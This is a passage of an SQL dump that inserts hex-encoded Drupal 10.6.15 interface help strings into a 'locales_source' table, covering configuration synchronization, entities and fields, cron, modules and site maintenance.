73696f6e2e, '', '10.6.15'),
(3383, 0x5768617420697320636f6e66696775726174696f6e2073796e6368726f6e697a6174696f6e3f, '', '10.6.15'),
(3384, 0x436f6e66696775726174696f6e2073796e6368726f6e697a6174696f6e206973207468652070726f63657373206f66206578706f7274696e6720616e6420696d706f7274696e6720636f6e66696775726174696f6e20746f206b65657020636f6e66696775726174696f6e2073796e6368726f6e697a6564206265747765656e20646966666572656e742076657273696f6e73206f66206120736974653b20666f72206578616d706c652c206265747765656e206120646576656c6f706d656e74207369746520616e6420746865206c69766520736974652e, '', '10.6.15'),
(3385, 0x4561636820736974652068617320756e69717565206964656e7469666965722c20616c736f2063616c6c65642061203c656d3e555549443c2f656d3e2c207768696368206964656e74696669657320746865207369746520746f207468652073797374656d20696e20616e7920696e7374616e6365206f662074686520736974652c206173206c6f6e6720617320746865207369746520696e7374616e6365732068617665206265656e20726570726f647563656420617320636c6f6e65732028636c6f6e696e67206973207768656e2074686520636f64656261736520616e642064617461626173652061726520636f7069656420746f206372656174652061206e6577207369746520696e7374616e6365292e205768656e207369746520696e7374616e6365732061726520636c6f6e65642c206120226465762220696e7374616e6365206f6620746865207369746520686173207468652073616d6520555549442061732074686520226c6976652220696e7374616e63652e205768656e207369746520696e7374616e636573207368617265207468652073616d6520555549442c20636f6e66696775726174696f6e2063616e206265206578706f727465642066726f6d206f6e6520696e7374616e636520746f20616e6f746865722e, '', '10.6.15'),
(3386, 0x54686520666f6c6c6f77696e67206c69737420636f6e7461696e73207465726d7320616e6420636f6e63657074732072656c6174656420746f20636f6e66696775726174696f6e2073796e6368726f6e697a6174696f6e3a, '', '10.6.15'),
(3387, 0x4578706f7274656420636f6e66696775726174696f6e, '', '10.6.15'),
(3388, 0x5768656e20636f6e66696775726174696f6e206973206578706f727465642c207468652061637469766520636f6e66696775726174696f6e206973206578706f72746564206173206120736574206f662066696c657320696e2059414d4c20666f726d61742e205768656e207573696e6720746865203c656d3e436f6e66696775726174696f6e2073796e6368726f6e697a6174696f6e3c2f656d3e2061646d696e6973747261746976652055492c20636f6e66696775726174696f6e2063616e206265206578706f7274656420617320612066756c6c2d6578706f7274206f722073696e676c652d6974656d20617263686976652e205468697320617263686976652063616e207468656e20626520696d706f7274656420696e746f207468652064657374696e6174696f6e207369746520696e7374616e63652e, '', '10.6.15'),
(3389, 0x496d706f7274656420636f6e66696775726174696f6e, '', '10.6.15'),
(3390, 0x496d706f7274656420636f6e66696775726174696f6e20697320636f6e66696775726174696f6e207468617420686173206265656e206578706f727465642066726f6d20616e6f7468657220696e7374616e6365206f6620746865207369746520287468652022736f75726365222920616e64206973206e6f77206265696e6720696d706f7274656420696e746f20616e6f74686572207369746520696e7374616e63652028746865202264657374696e6174696f6e22292c2074686572656279207570646174696e67206974732061637469766520636f6e66696775726174696f6e20746f206d617463682074686520696d706f7274656420636f6e66696775726174696f6e2064617461207365742e, '', '10.6.15'),
(3391, 0x436f6e66696775726174696f6e2073796e63206469726563746f7279, '', '10.6.15'),
(3392, 0x54686520636f6e66696775726174696f6e2073796e63206469726563746f7279206c6f636174696f6e2069732073657420696e2074686520736974652773203c656d3e73657474696e67732e7068703c2f656d3e2066696c652e205768656e20636f6e66696775726174696f6e206973206578706f727465642c207468652061637469766520636f6e66696775726174696f6e206973206578706f7274656420616e642064657363726962656420696e2059414d4c2066696c6573207768696368206172652073746f72656420696e2074686520636f6e66696775726174696f6e2073796e63206469726563746f72792e20416674657220746865206669727374206578706f72742c207468652073797374656d20636f6d706172657320746865207369746527732061637469766520636f6e66696775726174696f6e20776974682074686520636f6e66696775726174696f6e206461746120696e207468652073796e63206469726563746f727920616e642077696c6c206f6e6c79206578706f72742061637469766520636f6e66696775726174696f6e206974656d7320746861742061726520646966666572656e74207468616e20746865697220636f756e746572706172747320696e207468652073796e63206469726563746f72792e, '', '10.6.15'),
(3393, 0x4d616e6167696e6720636f6e66696775726174696f6e206f76657276696577, '', '10.6.15'),
(3394, 0x436f6e66696775726174696f6e206d616e6167656d656e74207461736b732c2073756368206173206578706f7274696e67206f7220696d706f7274696e6720636f6e66696775726174696f6e20616e642073796e6368726f6e697a696e6720636f6e66696775726174696f6e2c2063616e20626520646f6e6520656974686572207468726f756768207468652061646d696e6973747261746976652055492070726f76696465642062792074686520636f726520436f6e66696775726174696f6e204d616e61676572206d6f64756c65206f72206120636f6d6d616e642d6c696e6520696e746572666163652028434c492920746f6f6c2e20446566696e696e67206120636f6e66696775726174696f6e2073796e63206469726563746f72792070617468206f74686572207468616e207468652064656661756c742076616c756520726571756972657320726561642f77726974652061636365737320746f2074686520736974652773203c656d3e73657474696e67732e7068703c2f656d3e2066696c652e, '', '10.6.15'),
(3395, 0x4d6f7374206d6f64756c657320616e64207468656d657320616c736f2070726f766964652073657474696e677320666f726d7320666f72207570646174696e672074686520636f6e66696775726174696f6e20746865792070726f766964652e20536565207468652072656c6174656420746f70696373206c69737465642062656c6f7720666f72207370656369666963207461736b732e, '', '10.6.15'),
(3396, 0x3c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f646f63732f636f6e66696775726174696f6e2d6d616e6167656d656e742f776f726b666c6f772d7573696e672d6472757368223e436f6e66696775726174696f6e204d616e6167656d656e743a20576f726b666c6f77207573696e672044727573683c2f613e, '', '10.6.15'),
(3397, 0x3c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f646f63732f757365725f67756964652f656e2f756e6465727374616e64696e672d646174612e68746d6c223e436f6e636570743a205479706573206f662044617461202844727570616c2055736572204775696465293c2f613e, '', '10.6.15'),
(3398, 0x3c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f646f63732f757365725f67756964652f656e2f696e7374616c6c2d6465762d73697465732e68746d6c223e436f6e636570743a20446576656c6f706d656e74205369746573202844727570616c2055736572204775696465293c2f613e, '', '10.6.15'),
(3399, 0x3c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f646f63732f757365725f67756964652f656e2f696e7374616c6c2d6465762d6d616b696e672e68746d6c223e4d616b696e67206120446576656c6f706d656e742053697465202844727570616c2055736572204775696465293c2f613e, '', '10.6.15'),
(3400, 0x57686174207479706573206f66206461746120646f65732061207369746520686176653f, '', '10.6.15'),
(3401, 0x54686572652061726520666f7572206d61696e207479706573206f6620646174612e203c656d3e436f6e74656e743c2f656d3e2069732074686520696e666f726d6174696f6e2028746578742c20696d616765732c206574632e29206d65616e7420746f20626520646973706c6179656420746f20776562736974652076697369746f72732e203c656d3e436f6e66696775726174696f6e3c2f656d3e2069732064617461207468617420646566696e657320686f772074686520636f6e74656e7420697320646973706c617965643b20736f6d6520636f6e66696775726174696f6e202873756368206173206669656c64206c6162656c7329206d617920616c736f2062652076697369626c6520746f20736974652076697369746f72732e203c656d3e53746174653c2f656d3e2069732074656d706f7261727920646174612061626f757420746865207374617465206f6620796f757220736974652c207375636820617320746865206c6173742074696d65207468652073797374656d203c656d3e63726f6e3c2f656d3e206a6f62732072616e2e203c656d3e53657373696f6e3c2f656d3e206973206120737562736574206f6620537461746520696e666f726d6174696f6e2c2072656c6174656420746f2075736572732720696e746572616374696f6e7320776974682074686520736974652c2073756368206173207369746520636f6f6b69657320616e642077686574686572206f72206e6f74207468657920617265206c6f6767656420696e2e, '', '10.6.15'),
(3402, 0x57686174206973206120636f6e74656e7420656e746974793f, '', '10.6.15'),
(3403, 0x41203c656d3e636f6e74656e7420656e746974793c2f656d3e20286f72206d6f726520636f6d6d6f6e6c792c203c656d3e656e746974793c2f656d3e2920697320616e206974656d206f6620636f6e74656e7420646174612c2077686963682063616e20636f6e73697374206f6620746578742c2048544d4c206d61726b75702c20696d616765732c2061747461636865642066696c65732c20616e64206f7468657220646174612e20436f6e74656e7420656e746974696573206172652067726f7570656420696e746f203c656d3e656e746974792074797065733c2f656d3e2c207768696368206861766520646966666572656e7420707572706f73657320616e642061726520646973706c6179656420696e207665727920646966666572656e742077617973206f6e2074686520736974652e204d6f737420656e746974792074797065732061726520616c736f206469766964656420696e746f203c656d3e656e74697479207375622d74797065733c2f656d3e2c20776869636820617265206469766973696f6e732077697468696e20616e20656e74697479207479706520746f20616c6c6f7720666f7220736d616c6c657220766172696174696f6e7320696e20686f772074686520656e74697469657320617265207573656420616e6420646973706c617965642e20466f72206578616d706c652c20746865203c656d3e436f6e74656e74206974656d3c2f656d3e20656e74697479207479706520746861742073746f72657320706167652d6c6576656c20636f6e74656e74206973206469766964656420696e746f203c656d3e636f6e74656e7420747970653c2f656d3e207375622d74797065733b20746865203c656d3e436f6e74656e7420626c6f636b3c2f656d3e20656e74697479207479706520686173203c656d3e626c6f636b2074797065733c2f656d3e3b2062757420746865203c656d3e557365723c2f656d3e20656e7469747920747970652028666f7220757365722070726f66696c6520696e666f726d6174696f6e2920646f6573206e6f742068617665207375622d74797065732e, '', '10.6.15'),
(3404, 0x576861742069732061206669656c643f, '', '10.6.15'),
(3405, 0x57697468696e20656e74697479206974656d732c2074686520646174612069732073746f72656420696e20696e646976696475616c203c656d3e6669656c64733c2f656d3e2c2065616368206f6620776869636820686f6c6473206f6e652074797065206f6620646174612c207375636820617320666f726d6174746564206f7220706c61696e20746578742c20696d61676573206f72206f746865722066696c65732c206f722064617465732e204669656c64732063616e20626520616464656420627920616e2061646d696e6973747261746f72206f6e20656e74697479207375622d74797065732c20736f207468617420616c6c20656e74697479206974656d73206f66206120676976656e20656e74697479207375622d747970652068617665207468652073616d6520636f6c6c656374696f6e206f66206669656c647320617661696c61626c652c20616e6420746865792063616e2062652073696e676c652d76616c756564206f72206d756c7469706c652d76616c7565642e205768656e20796f7520637265617465206f72206564697420656e74697479206974656d732c20796f75206172652073706563696679696e67207468652076616c75657320666f7220746865206669656c6473206f6e2074686520656e74697479206974656d2e, '', '10.6.15'),
(3406, 0x576861742069732061207265666572656e6365206669656c643f, '', '10.6.15'),
(3407, 0x41203c656d3e7265666572656e6365206669656c643c2f656d3e2069732061206669656c6420746861742073746f72657320612072656c6174696f6e73686970206265747765656e20616e20656e7469747920616e64206f6e65206f72206d6f7265206f7468657220656e7469746965732c207768696368206d61792062656c6f6e6720746f207468652073616d65206f7220646966666572656e7420656e7469747920747970652e20466f72206578616d706c652c2061203c656d3e436f6e74656e74207265666572656e63653c2f656d3e206669656c64206f6e206120636f6e74656e7420747970652073746f72657320612072656c6174696f6e73686970206265747765656e206f6e6520636f6e74656e74206974656d20616e64206f6e65206f72206d6f7265206f7468657220636f6e74656e74206974656d732e, '', '10.6.15'),
(3408, 0x57686174206669656c642074797065732061726520617661696c61626c653f, '', '10.6.15'),
(3409, 0x54686520666f6c6c6f77696e67206669656c64207479706573206172652070726f76696465642062792074686520636f72652073797374656d20616e6420636f7265206d6f64756c657320286d616e79206d6f7265206172652070726f766964656420627920636f6e7472696275746564206d6f64756c6573293a, '', '10.6.15'),
(3410, 0x426f6f6c65616e2c204e756d626572202870726f76696465642062792074686520636f72652073797374656d293a2053746f72657320747275652f66616c73652076616c75657320616e64206e756d62657273, '', '10.6.15'),
(3411, 0x436f6d6d656e74202870726f76696465642062792074686520636f726520436f6d6d656e74206d6f64756c65293a20416c6c6f777320757365727320746f2061646420636f6d6d656e747320746f20616e20656e74697479, '', '10.6.15'),
(3412, 0x446174652c2054696d657374616d7020284461746574696d65206d6f64756c65293a2053746f72657320646174657320616e642074696d6573, '', '10.6.15'),
(3413, 0x446174652072616e676520284461746574696d652072616e6765206d6f64756c65293a2053746f7265732074696d652f6461746520706572696f64732077697468206120737461727420616e6420616e20656e64, '', '10.6.15'),
(3414, 0x456d61696c2028636f72652073797374656d293a2053746f72657320656d61696c20616464726573736573, '', '10.6.15'),
(3415, 0x4c696e6b20284c696e6b206d6f64756c65293a2053746f7265732055524c7320616e64206c696e6b2074657874, '', '10.6.15'),
(3416, 0x4c69737420284f7074696f6e73206d6f64756c65293a2053746f7265732076616c7565732063686f73656e2066726f6d207072652d646566696e6564206c697374732c207768657265207468652076616c7565732063616e206265206e756d62657273206f7220746578743b207365652073656374696f6e2062656c6f7720666f72206d6f7265206f6e206c697374206669656c64732e, '', '10.6.15'),
(3417, 0x5265666572656e63652028636f72652073797374656d293a2053746f72657320656e74697479207265666572656e6365733b207365652073656374696f6e2061626f7665, '', '10.6.15'),
(3418, 0x54656c6570686f6e65202854656c6570686f6e65206d6f64756c65293a2053746f7265732074656c6570686f6e65206e756d62657273, '', '10.6.15'),
(3419, 0x54657874202854657874206d6f64756c65293a2053746f72657320666f726d617474656420616e6420756e666f726d617474656420746578743b207365652073656374696f6e2062656c6f7720666f72206d6f7265206f6e2074657874206669656c64732e, '', '10.6.15'),
(3420, 0x576861742073657474696e67732061726520617661696c61626c6520666f72204c697374206669656c642074797065733f, '', '10.6.15'),
(3421, 0x4c697374206669656c6473206173736f6369617465207072652d646566696e6564203c656d3e6b6579733c2f656d3e20286f722076616c756520636f646573292077697468203c656d3e6c6162656c733c2f656d3e207468617420746865207573657220736565732e20466f72206578616d706c652c20796f75206d6967687420646566696e652061206c697374206669656c6420746861742073686f777320746865207573657220746865206e616d6573206f66207365766572616c206c6f636174696f6e732c207768696c6520626568696e6420746865207363656e65732061206c6f636174696f6e20636f64652069732073746f72656420696e207468652064617461626173652e2045616368206c697374206669656c64207479706520636f72726573706f6e647320746f206f6e652074797065206f662073746f726564206b65792e20466f72206578616d706c652c2061203c656d3e4c6973742028696e7465676572293c2f656d3e206669656c642073746f72657320696e7465676572732c207768696c6520746865203c656d3e4c697374202874657874293c2f656d3e206669656c642073746f726573207465787420737472696e67732e204f6e636520796f7520686176652063686f73656e20746865206669656c6420747970652c20746865206d61696e2073657474696e6720666f722061206c697374206669656c6420697320746865203c656d3e416c6c6f7765642076616c7565733c2f656d3e206c6973742c207768696368206173736f63696174657320746865206b657973207769746820746865206c6162656c732e, '', '10.6.15'),
(3422, 0x57686174207479706573206f662054657874206669656c64732061726520617661696c61626c653f, '', '10.6.15'),
(3423, 0x546865726520617265207365766572616c207479706573206f662074657874206669656c64732c207769746820646966666572656e74206368617261637465726973746963732e2054657874206669656c64732063616e20626520656974686572203c656d3e706c61696e3c2f656d3e206f72203c656d3e666f726d61747465643c2f656d3e3a20706c61696e2074657874206669656c647320646f206e6f7420636f6e7461696e2048544d4c2c207768696c6520666f726d6174746564206669656c64732063616e20636f6e7461696e2048544d4c20616e64206172652070726f636573736564207468726f756768203c656d3e746578742066696c746572733c2f656d3e20287468657365206172652070726f76696465642062792074686520636f72652046696c746572206d6f64756c653b20696620796f7520686176652074686174206d6f64756c6520656e61626c65642c20736565207468652072656c6174656420746f7069632062656c6f77206f6e2066696c7465727320666f72206d6f726520696e666f726d6174696f6e292e2054657874206669656c64732063616e20616c736f20626520726567756c61722d6c656e6774682028776974682061206c696d6974206f6620323535206368617261637465727329206f72203c656d3e6c6f6e673c2f656d3e20287769746820612076657279206c6172676520636861726163746572206c696d6974292c20616e64206c6f6e6720666f726d61747465642074657874206669656c64732063616e20696e636c7564652061203c656d3e73756d6d6172793c2f656d3e206174747269627574652e20416c6c20706f737369626c6520636f6d62696e6174696f6e73206f66207468657365206368617261637465726973746963732065786973742061732074657874206669656c642074797065733b20666f72206578616d706c652c203c656d3e546578742028706c61696e293c2f656d3e20616e64203c656d3e546578742028666f726d61747465642c206c6f6e672c20776974682073756d6d617279293c2f656d3e206172652074776f206578616d706c6573206f662074657874206669656c642074797065732e, '', '10.6.15'),
(3424, 0x57686174206973206120666f726d61747465723f, '', '10.6.15'),
(3425, 0x41203c656d3e666f726d61747465723c2f656d3e20697320612077617920746f20646973706c61792061206669656c643b206d6f7374206669656c64207479706573206f66666572207365766572616c207479706573206f6620666f726d6174746572732c20616e64206d6f737420666f726d61747465727320686176652073657474696e67732074686174206675727468657220646566696e6520686f7720746865206669656c6420697320646973706c617965642e20497420697320616c736f20706f737369626c6520746f20636f6d706c6574656c7920686964652061206669656c642066726f6d20646973706c61792c20616e6420796f75206861766520746865206f7074696f6e206f662073686f77696e67206f7220686964696e6720746865206669656c642773206c6162656c207768656e20697420697320646973706c617965642e, '', '10.6.15'),
(3426, 0x576861742069732061207769646765743f, '', '10.6.15'),
(3427, 0x41203c656d3e7769646765743c2f656d3e20697320612077617920746f20656469742061206669656c642e20536f6d65206669656c642074797065732c207375636820617320706c61696e20746578742073696e676c652d6c696e65206669656c64732c2068617665206f6e6c79206f6e652077696467657420617661696c61626c652028696e207468697320636173652c20612073696e676c652d6c696e65207465787420696e707574206669656c64292e204f74686572206669656c64207479706573206f666665722063686f6963657320666f7220746865207769646765743b20666f72206578616d706c652c2073696e676c652d76616c756564203c656d3e4c6973743c2f656d3e206669656c64732063616e207573652061203c656d3e53656c6563743c2f656d3e206f72203c656d3e526164696f20627574746f6e3c2f656d3e2077696467657420666f722065646974696e672e204d616e792077696467657420747970657320686176652073657474696e67732074686174206675727468657220646566696e6520686f7720746865206669656c642063616e206265206564697465642e, '', '10.6.15'),
(3428, 0x4d616e6167696e6720636f6e74656e7420737472756374757265206f76657276696577, '', '10.6.15'),
(3429, 0x4265736964657320746865206669656c64206d6f64756c6573206c697374656420696e207468652070726576696f75732073656374696f6e2c20746865726520617265206164646974696f6e616c20636f7265206d6f64756c6573207468617420796f752063616e2075736520746f206d616e61676520796f757220636f6e74656e74207374727563747572653a, '', '10.6.15'),
(3430, 0x54686520636f7265204e6f64652c20436f6d6d656e742c20436f6e74656e7420426c6f636b2c20437573746f6d204d656e75204c696e6b732c20557365722c2046696c652c20496d6167652c204d656469612c205461786f6e6f6d792c20616e6420436f6e74616374206d6f64756c657320616c6c2070726f7669646520636f6e74656e7420656e746974792074797065732e, '', '10.6.15'),
(3431, 0x54686520636f7265204669656c64205549206d6f64756c652070726f76696465732061207573657220696e7465726661636520666f72206d616e6167696e67206669656c647320616e6420746865697220646973706c6179206f6e20656e7469746965732e, '', '10.6.15'),
(3432, 0x54686520636f7265204c61796f7574204275696c646572206d6f64756c652070726f76696465732061206d6f726520666c657869626c65207573657220696e7465726661636520666f7220636f6e6669677572696e672074686520646973706c6179206f6620656e7469746965732e, '', '10.6.15'),
(3433, 0x54686520636f72652046696c7465722c20526573706f6e7369766520496d6167652c20616e642050617468206d6f64756c65732070726f766964652073657474696e677320616e6420646973706c6179206f7074696f6e7320666f7220656e74697469657320616e64206669656c64732e, '', '10.6.15'),
(3434, 0x446570656e64696e67206f6e2074686520636f726520616e6420636f6e7472696275746564206d6f64756c6573207468617420796f752063757272656e746c79206861766520696e7374616c6c6564206f6e20796f757220736974652c207468652072656c6174656420746f706963732062656c6f7720616e64206f7468657220746f70696373206c6973746564206f6e20746865206d61696e2068656c7020706167652028736565204068656c705f6c696e6b292077696c6c2068656c7020796f752077697468207461736b732072656c6174656420746f20636f6e74656e74207374727563747572652e, '', '10.6.15'),
(3435, 0x3c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f646f63732f757365725f67756964652f656e2f706c616e6e696e672d636861707465722e68746d6c223e506c616e6e696e6720796f75722053697465202844727570616c2055736572204775696465293c2f613e, '', '10.6.15'),
(3436, 0x3c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f646f63732f757365725f67756964652f656e2f7374727563747572652d7265666572656e63652d6669656c64732e68746d6c223e436f6e636570743a205265666572656e6365204669656c6473202844727570616c2055736572204775696465293c2f613e, '', '10.6.15'),
(3437, 0x52756e6e696e6720616e6420636f6e6669677572696e672063726f6e, '', '10.6.15'),
(3438, 0x436f6e66696775726520796f75722073797374656d20736f20746861742063726f6e2077696c6c2072756e206175746f6d61746963616c6c792e, '', '10.6.15'),
(3439, 0x57686174206172652063726f6e207461736b733f, '', '10.6.15'),
(3440, 0x546f20656e73757265207468617420796f7572207369746520616e6420697473206d6f64756c657320636f6e74696e756520746f2066756e6374696f6e2077656c6c2c20612067726f7570206f662061646d696e697374726174697665206f7065726174696f6e732073686f756c642062652072756e20706572696f646963616c6c792e205468657365206f7065726174696f6e73206172652063616c6c6564203c656d3e63726f6e3c2f656d3e207461736b732c20616e642072756e6e696e6720746865207461736b73206973206b6e6f776e206173203c656d3e72756e6e696e672063726f6e3c2f656d3e2e20446570656e64696e67206f6e20686f77206f6674656e20636f6e74656e742069732075706461746564206f6e20796f757220736974652c20796f75206d69676874206e65656420746f2072756e2063726f6e206f6e2061207363686564756c652072616e67696e672066726f6d20686f75726c7920746f207765656b6c7920746f206b65657020796f757220736974652072756e6e696e672077656c6c2e, '', '10.6.15'),
(3441, 0x57686174206f7074696f6e732061726520617661696c61626c6520666f722072756e6e696e672063726f6e3f, '', '10.6.15'),
(3442, 0x49662074686520636f7265204175746f6d617465642043726f6e206d6f64756c6520697320696e7374616c6c65642c20796f757220736974652077696c6c2072756e2063726f6e20706572696f646963616c6c792c206f6e2061207363686564756c6520796f752063616e20636f6e6669677572652e, '', '10.6.15'),
(3443, 0x596f752063616e207365742075702061207461736b206f6e20796f7572207765622073657276657220746f20766973697420746865203c656d3e2063726f6e2055524c3c2f656d3e2c20776869636820697320756e6971756520746f20796f757220736974652c206f6e2061207363686564756c652e, '', '10.6.15'),
(3444, 0x596f752063616e20616c736f2072756e2063726f6e206d616e75616c6c792c206275742074686973206973206e6f7420746865207265636f6d6d656e6465642077617920746f206d616b6520737572652069742069732072756e20706572696f646963616c6c792e, '', '10.6.15'),
(3445, 0x496e20746865203c656d3e4d616e6167653c2f656d3e2061646d696e697374726174696f6e206d656e752c206e6176696761746520746f203c656d3e436f6e66696775726174696f6e3c2f656d3e202667743b203c656d3e53797374656d3c2f656d3e202667743b203c656d3e4063726f6e5f6c696e6b3c2f656d3e2e204e6f746520746865203c656d3e4c6173742072756e3c2f656d3e2074696d65206f6e2074686520706167652e, '', '10.6.15'),
(3446, 0x496620796f752077616e7420746f2072756e2063726f6e207269676874206e6f772c20636c69636b203c656d3e52756e2063726f6e3c2f656d3e20616e64207761697420666f722063726f6e20746f2066696e6973682e, '', '10.6.15');
INSERT INTO `locales_source` (`lid`, `source`, `context`, `version`) VALUES
(3447, 0x496620796f75206861766520612077617920746f20636f6e666967757265207461736b73206f6e20796f757220776562207365727665722c20636f707920746865206c696e6b2077686572652069742073617973203c656d3e546f2072756e2063726f6e2066726f6d206f7574736964652074686520736974652c20676f20746f3c2f656d3e2e205365742075702061207461736b20746f20766973697420746861742055524c206f6e20796f757220646573697265642063726f6e207363686564756c652c2073756368206173206f6e636520616e20686f7572206f72206f6e63652061207765656b2e20284f6e204c696e75782d6c696b6520736572766572732c20796f752063616e2075736520746865203c656d3e776765743c2f656d3e20636f6d6d616e6420746f20766973697420612055524c2e2920496620796f7520636f6e66696775726520616e206f757473696465207461736b2c20796f752073686f756c6420756e696e7374616c6c20746865204175746f6d617465642043726f6e206d6f64756c652e, '', '10.6.15'),
(3448, 0x496620796f7520617265206e6f7420636f6e6669677572696e6720616e206f757473696465207461736b2c20616e6420796f7520686176652074686520636f7265204175746f6d617465642043726f6e206d6f64756c6520696e7374616c6c65642c2073656c6563742061207363686564756c6520666f72206175746f6d617465642063726f6e2072756e7320696e203c656d3e43726f6e2073657474696e67733c2f656d3e202667743b203c656d3e52756e2063726f6e2065766572793c2f656d3e2e20436c69636b203c656d3e5361766520636f6e66696775726174696f6e3c2f656d3e2e, '', '10.6.15'),
(3449, 0x3c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f646f63732f757365725f67756964652f656e2f73656375726974792d63726f6e2d636f6e636570742e68746d6c223e436f6e636570743a2043726f6e202844727570616c2055736572204775696465293c2f613e, '', '10.6.15'),
(3450, 0x3c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f646f63732f757365725f67756964652f656e2f73656375726974792d63726f6e2e68746d6c223e436f6e6669677572696e672043726f6e204d61696e74656e616e6365205461736b73202844727570616c2055736572204775696465293c2f613e, '', '10.6.15'),
(3451, 0x457874656e64696e6720616e64206d6f64696679696e6720796f757220736974652066756e6374696f6e616c697479, '', '10.6.15'),
(3452, 0x576861742069732061206d6f64756c653f, '', '10.6.15'),
(3453, 0x41203c656d3e6d6f64756c653c2f656d3e206973206120736574206f66205048502c204a6176615363726970742c20616e642f6f72204353532066696c6573207468617420657874656e6473207369746520666561747572657320616e6420616464732066756e6374696f6e616c6974792e204120736574206f66203c656d3e436f7265206d6f64756c65733c2f656d3e2069732064697374726962757465642061732070617274206f662074686520636f726520736f66747761726520646f776e6c6f61642e204164646974696f6e616c203c656d3e436f6e7472696275746564206d6f64756c65733c2f656d3e2063616e20626520646f776e6c6f616465642073657061726174656c792066726f6d20746865203c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f70726f6a6563745f6d6f64756c65223e446f776e6c6f61642026616d703b20457874656e642070616765206f6e2064727570616c2e6f72673c2f613e2e, '', '10.6.15'),
(3454, 0x5768617420697320616e204578706572696d656e74616c206d6f64756c653f, '', '10.6.15'),
(3455, 0x416e203c656d3e4578706572696d656e74616c3c2f656d3e206d6f64756c652069732061206d6f64756c652074686174206973207374696c6c20696e20646576656c6f706d656e7420616e64206973206e6f742079657420737461626c652e205573696e67204578706572696d656e74616c206d6f64756c6573206f6e2070726f64756374696f6e207369746573206973206e6f74207265636f6d6d656e6465642e, '', '10.6.15'),
(3456, 0x576861742061726520696e7374616c6c696e6720616e6420756e696e7374616c6c696e673f, '', '10.6.15'),
(3457, 0x496e7374616c6c696e67206120636f7265206f7220646f776e6c6f6164656420636f6e7472696275746564206d6f64756c65206d65616e73207475726e696e67206974206f6e2c20736f207468617420796f752063616e207573652069747320666561747572657320616e642066756e6374696f6e616c6974792e20556e696e7374616c6c696e67206d65616e73207475726e696e67206974206f666620616e642072656d6f76696e6720616c6c206f662069747320636f6e66696775726174696f6e2e2041206d6f64756c652063616e6e6f7420626520756e696e7374616c6c656420696620616e6f7468657220696e7374616c6c6564206d6f64756c6520646570656e6473206f6e2069742c206f7220696620796f752068617665206372656174656420636f6e74656e74206f6e20796f75722073697465207573696e6720746865206d6f64756c65202d2d20796f7520776f756c64206e65656420746f2064656c6574652074686520636f6e74656e7420616e6420756e696e7374616c6c20646570656e64656e74206d6f64756c65732066697273742e, '', '10.6.15'),
(3458, 0x457874656e64696e67206f76657276696577, '', '10.6.15'),
(3459, 0x536565207468652072656c6174656420746f70696373206c69737465642062656c6f7720666f722068656c7020706572666f726d696e67207461736b732072656c6174656420746f20657874656e64696e67207468652066756e6374696f6e616c697479206f6620796f757220736974652e, '', '10.6.15'),
(3460, 0x3c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f646f63732f757365725f67756964652f656e2f756e6465727374616e64696e672d6d6f64756c65732e68746d6c223e436f6e636570743a204d6f64756c6573202844727570616c2055736572204775696465293c2f613e, '', '10.6.15'),
(3461, 0x3c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f646f63732f757365725f67756964652f656e2f657874656e642d636861707465722e68746d6c223e457874656e64696e6720616e6420437573746f6d697a696e6720596f75722053697465202844727570616c2055736572204775696465293c2f613e, '', '10.6.15'),
(3462, 0x4d61696e7461696e696e6720616e642074726f75626c6573686f6f74696e6720796f75722073697465, '', '10.6.15'),
(3463, 0x4d61696e7461696e696e6720616e642074726f75626c6573686f6f74696e67206f76657276696577, '', '10.6.15'),
(3464, 0x486572652061726520736f6d65207461736b7320616e642068696e74732072656c6174656420746f206d61696e7461696e696e6720796f757220736974652c20616e642074726f75626c6573686f6f74696e672070726f626c656d732074686174206d617920636f6d65207570206f6e20796f757220736974652e20536565207468652072656c6174656420746f706963732062656c6f7720666f72206d6f726520696e666f726d6174696f6e2e, '', '10.6.15'),
(3465, 0x5768656e20706572666f726d696e67206d61696e74656e616e63652c207375636820617320696e7374616c6c696e672c20756e696e7374616c6c696e672c206f72207570646174696e672061206d6f64756c652c2070757420796f7572207369746520696e206d61696e74656e616e6365206d6f64652e, '', '10.6.15'),
(3466, 0x436f6e66696775726520796f7572207369746520736f20746861742063726f6e2072756e7320706572696f646963616c6c792e, '', '10.6.15'),
(3467, 0x496620796f75722073697465206973206e6f74206265686176696e672061732065787065637465642c20636c65617220746865206361636865206265666f726520747279696e6720746f20646961676e6f7365207468652070726f626c656d2e, '', '10.6.15'),
(3468, 0x546865726520617265207365766572616c2073697465207265706f72747320746861742063616e2068656c7020796f7520646961676e6f73652070726f626c656d73207769746820796f757220736974652e2054686572652061726520616c736f2074776f20636f7265206d6f64756c657320746861742063616e206265207573656420666f72206572726f72206c6f6767696e673a204461746162617365204c6f6767696e6720616e64205379736c6f672e, '', '10.6.15'),
(3469, 0x3c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f646f63732f757365725f67756964652f656e2f70726576656e742d636861707465722e68746d6c223e50726576656e74696e6720616e6420466978696e672050726f626c656d73202844727570616c2055736572204775696465293c2f613e, '', '10.6.15'),
(3470, 0x3c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f646f63732f757365725f67756964652f656e2f73656375726974792d636861707465722e68746d6c223e536563757269747920616e64204d61696e74656e616e6365202844727570616c2055736572204775696465293c2f613e, '', '10.6.15'),
(3471, 0x4d616e6167696e67206d65646961, '', '10.6.15'),
(3472, 0x5768617420617265206d65646961206974656d733f, '', '10.6.15'),
